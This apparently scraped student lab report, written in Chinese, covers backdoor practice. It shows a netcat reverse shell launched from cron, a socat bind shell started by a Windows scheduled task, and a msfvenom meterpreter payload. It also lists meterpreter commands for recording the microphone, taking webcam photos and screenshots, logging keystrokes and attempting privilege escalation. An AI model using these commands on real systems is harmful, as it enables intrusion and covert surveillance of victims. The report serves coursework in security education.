2. 程式人生 > >20155209 林虹宇Exp2 後門原理與實踐

20155209 林虹宇Exp2 後門原理與實踐

阿新 發佈:2018-03-31
拍照 端口 一個 err 當前 list gets 沒有 com

Exp2 後門原理與實踐

實驗內容

一、使用netcat獲取主機操作Shell,cron啟動

使用netcat獲取主機操作Shell

  • Win獲得Linux Shell

  1. 查看win的ip地址
    技術分享圖片

  2. windows 打開監聽
    技術分享圖片

  3. Linux反彈連接win

  4. windows下獲得一個linux shell,可運行任何指令,如ls
    技術分享圖片

  • Linux獲得Win Shell

  1. 查看kali的ip地址
    技術分享圖片

  2. Linux運行監聽指令
  3. Windows反彈連接Linux

  4. Linux下看到Windows的命令提示
    kali_win.png
    技術分享圖片

  • nc傳輸數據

  1. Windows下監聽端口:
    技術分享圖片

  2. Kali下連接到Windows的端口:

  3. 可以傳輸字符串。
    技術分享圖片

cron啟動

  1. 先在Windows系統下,監聽5209端口:

  2. 在Kali環境下,使用man crontab指令查看crontab命令的幫助文檔,從文檔中我們可以知道crontab指令可以用於設置周期性被執行的指令。該命令從標準輸入設備讀取指令,並將其存放於crontab文件中,以供之後讀取和執行。
    技術分享圖片

  3. 用crontab -e指令編輯一條定時任務

  4. 在最後一行添加10 * * * * /bin/netcat 192.168.33.130 5209 -e /bin/sh。依據我做實驗的時間,我將其設置在每小時的第十分鐘。
    技術分享圖片

  5. 當時間到了,此時已經獲得了Kali的shell,可以輸入指令
    技術分享圖片

二、使用socat獲取主機操作Shell, 任務計劃啟動

  • socat基本語法 socat [options]
  • 其中這2個address就是關鍵了,如果要解釋的話,address就類似於一個文件描述符,socat所做的工作就是在2個address指定的描述符間建立一個pipe用於發送和接收數據。
  1. Windows->控制面板->管理工具->任務計劃程序.執行上述步驟

  2. 新建一個觸發器,選擇當鎖定任何用戶的工作站時
    技術分享圖片

  3. 在操作->程序或腳本中選擇你的socat.exe文件的路徑,在添加參數一欄填寫tcp-listen:5209 exec:cmd.exe,pty,stderr
    技術分享圖片

  4. 創建完成之後,按Windows+L快捷鍵鎖定計算機

  5. 此時,在Kali環境下輸入指令socat - tcp:10.1.1.141:5209。即可獲得了一個cmd shell
    技術分享圖片

三、使用MSF meterpreter(或其他軟件)生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell

  1. 通過模仿命令
    ``msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.136PORT=443 -f exe > meter_backdoor.exe

```
生成自己的後門程序。

  1. 將生成的文件復制到win,我使用之前的nc指令將後門程序傳到win。
    技術分享圖片

  2. 在Kali上使用msfconsole指令進入msf控制臺
    技術分享圖片

  3. 進入handler模式
    技術分享圖片

  4. 設置payload,設置LHOST,設置LPORT
    技術分享圖片

技術分享圖片

  1. 全部設置完成之後,kali下開始監聽,win下啟動後門程序,kali下即獲得win的shell
    技術分享圖片

技術分享圖片

四、使用MSF meterpreter(或其他軟件)生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權

  1. 使用record_mic指令可以截獲一段音頻:
    技術分享圖片

  2. 使用webcam_snap指令可以使用攝像頭進行拍照:
    技術分享圖片

技術分享圖片

  1. 使用webcam stream指令可以使用攝像頭進行錄像
    技術分享圖片

  2. 使用screenshot指令可以進行截屏:
    技術分享圖片

  3. 使用keyscan_start指令開始記錄下擊鍵的過程,使用keyscan_dump指令讀取擊鍵的記錄:
    技術分享圖片

  4. 先使用getuid指令查看當前用戶,使用getsystem指令進行提權。但是結果顯示提權失敗,可能是使用的系統有問題。
    技術分享圖片

基礎問題回答

  • 例舉你能想到的一個後門進入到你系統中的可能方式?
  • 平時在網絡上下載東西,其中可能包含後門程序。
  • 例舉你知道的後門如何啟動起來(win及linux)的方式?
  • 通過遠程控制開啟後門程序。
  • 使用定時任務,定時開啟。
  • Meterpreter有哪些給你映像深刻的功能?
  • 我覺得最厲害的是可以提權,獲得System權限,雖然我的提權實驗沒有成功。。。
  • 如何發現自己有的系統有沒有被安裝後門?
  • 通過殺毒軟件進行殺毒

20155209 林虹宇Exp2 後門原理與實踐

相關推薦

20155209 Exp2 後門原理實踐

拍照 端口 一個 err 當前 list gets 沒有 com Exp2 後門原理與實踐 實驗內容 一、使用netcat獲取主機操作Shell,cron啟動 使用netcat獲取主機操作Shell Win獲得Linux Shell 查看win的ip地址 windo

Exp2 後門原理實踐(未完待續)

bin image alt job 模塊 加強 ont .sh 問題 Exp2 後門原理與實踐 實驗環境 攻擊機 kali 4.14(64位) (IP: 10.0.2.6/24) 靶機 ubuntu 16.04(32位) (IP: 10.0.2.4/24) windo

網絡對抗技術 2017-2018-2 20152515 Exp2 後門原理實踐

技術分享 cnblogs 利用 mage 可選 任務計劃 攝像頭 寫入 提權 1.實驗內容 (1)使用netcat獲取主機操作Shell,cron啟動 (0.5分) (2)使用socat獲取主機操作Shell, 任務計劃啟動 (0.5分) (3)使用MSF meterp

20155216 Exp2 後門原理實踐

hand 地址 同時 bin log code 文字 其他 進行 後門原理與實踐 常用後門工具 NC 或 netcat netcat是一個底層工具,進行基本的TCP UDP數據收發。常被與其他工具結合使用,起到後門的作用。 Linux: 一般自帶netcat,"man ne

20155227《網絡對抗》Exp2 後門原理實踐

web img 準備 etc ons 並運行 reverse 體會 定時 20155227《網絡對抗》Exp2 後門原理與實踐 基礎問題回答 (1)例舉你能想到的一個後門進入到你系統中的可能方式? 在非官方網站下載軟件時,後門很可能被捆綁在軟件中。 攻擊者利用欺騙的手段,

20154324 劉康權 《網絡對抗》Exp2 後門原理實踐

nsh png netcat nta vim編輯 時間 clas 自己的 rontab 一、實踐目標與內容 1.學習內容 使用nc實現win,mac,Linux間的後門連接 meterpreter的應用 MSF POST 模塊的應用 2.學習目標 學習建立一個後門連接

Exp2 後門原理實踐 20154301仉鑫燁

編輯 lock 命令 兩臺 鎖定 com windows 程序 獲取 20154301《網絡對抗》Exp2 後門原理與實踐 20154301仉鑫燁 一、實驗內容 常用後門工具實踐: Windows獲得Linux Shell: 在Windows下,先使用ipconf

20155312 張競予 Exp2 後門原理實踐

gets std pty ever 哪些 分享圖片 程序 啟動過程 學會 Exp2 後門原理與實踐 目錄 基礎問題回答 (1)例舉你能想到的一個後門進入到你系統中的可能方式? (2)例舉你知道的後門如何啟動起來(win及linux)的方式? (3)Meterprete

Exp2 後門原理實踐

linux title 本機 學習目標 ont 網段 OS net channel 一、實踐目標與內容 1.學習內容 使用nc實現win,mac,Linux間的後門連接 meterpreter的應用 MSF POST 模塊的應用 2.學習目標 學習建

20155334 曹翔 Exp2 後門原理實踐

bubuko 直接 net 重定向 system 技術 image AR ali 20155334 曹翔 Exp2 後門原理與實踐 不多廢話直接上實驗過程,本實驗的所有端口都是5334。 一、實驗過程 查詢主機Windows和虛擬機kali的ip地址: Windows

2018-2019-2 網絡對抗技術 20165230 Exp2 後門原理實踐

ping 反向連接 後門 操作 netcat 方式 拍照 art 基本 目錄 1.實驗內容 2.基礎問題回答 3.常用後門工具實踐 3.1netcat 3.

Exp2 後門原理實踐 ——20164316張子遙

操作系統 linux定時任務 con 管理員 遠程控制 clear 最後一行 任務管理器 地址 一、實踐基本內容 1.實踐目標 (1)使用netcat獲取主機操作Shell,cron啟動 (2)使用socat獲取主機操作Shell, 任務計劃啟動 (3)使用MS

2018-2019-2 網絡對抗技術 20165231 Exp2 後門原理實踐

class 一個 打開 功能 目標 rontab head 定時任務 con 實驗內容 1.使用netcat獲取主機操作Shell,cron啟動 2.使用socat獲取主機操作Shell, 任務計劃啟動 3.使用MSF meterpreter(或其他軟件)生成可執

20165306 Exp2 後門原理實踐

技術分享 out web hot erp 流程 常用 開始 cron 20165306 Exp2 後門原理與實踐 實驗內容 (1)使用netcat獲取主機操作Shell,cron啟動 (2)使用socat獲取主機操作Shell, 任務計劃啟動 (3)使用MSF meterp

20165229 NetSec Exp2後門原理實踐

其他 準備 tun sfc ip地址 開機 消息 cor mach 20165229 NetSec Exp2後門原理與實踐 一、基礎問題 例舉你能想到的一個後門進入到你系統中的可能方式? 打開一個掛碼網頁,會自動下載安裝並執行木馬程序,在系統中留下後門。 將不明來源

Exp2後門原理實踐 20164312馬孝濤

有一個 方式 提權 3.2 控制 傳輸 監聽 web show 實驗內容 使用netcat獲取主機操作Shell,cron啟動 (0.5分) 使用socat獲取主機操作Shell, 任務計劃啟動 (0.5分) 使用MSF meterpreter

2018-2019-2 20165331《網絡對抗技術》Exp2 後門原理實踐

ima 例如 pty 並運行 art 就是 輸入 options lin 2018-2019-2 20165331《網絡對抗技術》Exp2 後門原理與實踐 實驗收獲與感想 通過本次實驗,我對後門的生成及工作原理有了更深的理解,也學會了怎樣用後門攻擊同一網段下的不同主機。但是

網路對抗技術Exp2-後門原理實踐

**後門概念** 後門就是不經過正常認證流程而訪問系統的通道。 哪裡有後門呢? 編譯器留後門 作業系統留後門 最常見的當然還是應用程式中留後門 還有就是潛伏於作業系統中或偽裝為特定應用的專用後門程式。 -- 下面是近些年的一些例子: 編譯器:蘋果Xcode後門事件。蘋果Xcode後門事件中招的APP包

20155209Exp4 惡意代碼分析

src 方法 shark 配置 查找 scan moni 網信 計劃 Exp4 惡意代碼分析 系統運行監控 使用schtasks指令監控系統運行 新建一個txt文件,然後將txt文件另存為一個bat格式文件 在bat格式文件裏輸入以下信息 然後使用管理員權限打開cmd

# 2018-2019-2 《網絡對抗技術》Exp2 後門原理應用 20165210

啟動組 and 攝像頭 完成 lis 準備就緒 下載文件 list ont 2018-2019-2 《網絡對抗技術》Exp2 後門原理與應用 20165210 實驗內容: 使用netcat獲取主機操作Shell,cron啟動。 使用Socat獲取主機操作Shell,任務計